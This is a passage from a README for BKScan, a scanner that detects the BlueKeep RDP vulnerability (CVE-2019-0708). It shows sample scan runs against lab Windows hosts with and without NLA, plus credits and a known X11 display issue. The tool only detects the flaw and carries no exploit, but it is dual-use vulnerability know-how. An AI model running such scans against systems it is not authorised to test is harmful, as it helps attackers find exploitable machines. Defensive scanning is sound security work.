privileges. Detection failed. Against a Windows 7 (vulnerable or patched) with NLA enabled and non-valid credentials: $ sudo ./bkscan.sh -t 192.168.119.141 -u user -p badpassword [+] Targeting 192.168.119.141:3389... [+] Using provided credentials, will support NLA [-] NLA enabled and access denied. Detection failed. Against a Windows 10 (non-vulnerable) with NLA enabled and non-valid credentials: $ sudo ./bkscan.sh -t 192.168.119.133 -u user -p badpassword [+] Targeting 192.168.119.133:3389... [+] Using provided credentials, will support NLA [-] NLA enabled and logon failure. Detection failed. Note: the difference in output between Windows 7 and Windows 10 is likely due to the Windows CredSSP versions and your output may differ. Target with NLA disabled Against a vulnerable Windows XP (no NLA support): $ sudo ./bkscan.sh -t 192.168.119.137 [+] Targeting 192.168.119.137:3389... [+] No credential provided, won't support NLA [-] Max sends reached, please wait to be sure... [!] Target is VULNERABLE!!! Target without RDP disabled Against a Windows 7 with RDP disabled or blocked port: $ sudo ./bkscan.sh -t 192.168.119.142 [+] Targeting 192.168.119.142:3389... [+] No credential provided, won't support NLA [-] Can't connect properly, check IP address and port. Thanks Special thanks to @JaGoTu and @zerosum0x0 for releasing their Unauthenticated CVE-2019-0708 "BlueKeep" Scanner, see here. The BKScan scanner in this repo works similarly to their scanner but has been ported to FreeRDP to support NLA. Thank you to mi2428 for releasing a script to run FreeRDP in Docker, see here. Also thank you to the following people for contributing: nikallass Problems? If you have a problem with the BlueKeep scanner, please create an issue on this github repository with the detailed output using ./bkscan.sh --debug. Known issues Failed to open display Some recent versions of Linux (e.g. Ubuntu 18.04 or Kali 2019.2 Rolling) do not play well with the $DISPLAY and $XAUTHORITY environment variables. $ sudo ./bkscan.sh -t 192.168.119.137 [+] Targeting 192.168.119.137:3389... [+] No credential provided, won't support NLA [07:58:35:866] [1:1] [ERROR][com.freerdp.client.x11] - failed to open display: :0 [07:58:35:866] [1:1] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set. It works fine on a fresh installation of Ubuntu 18.04 but not on an installation I have used for a while so I am blaming some updated X11-related package or configuration. docker-org documents this and proposes a solution but I haven't been able to have it working myself. So I am not sure they are describing the same issue. If you have this issue initially and are able to fix it, please feel free to do a PR. Contact @saidelike Sursa: https://github.com/nccgroup/BKScan
×
×
  • Create New...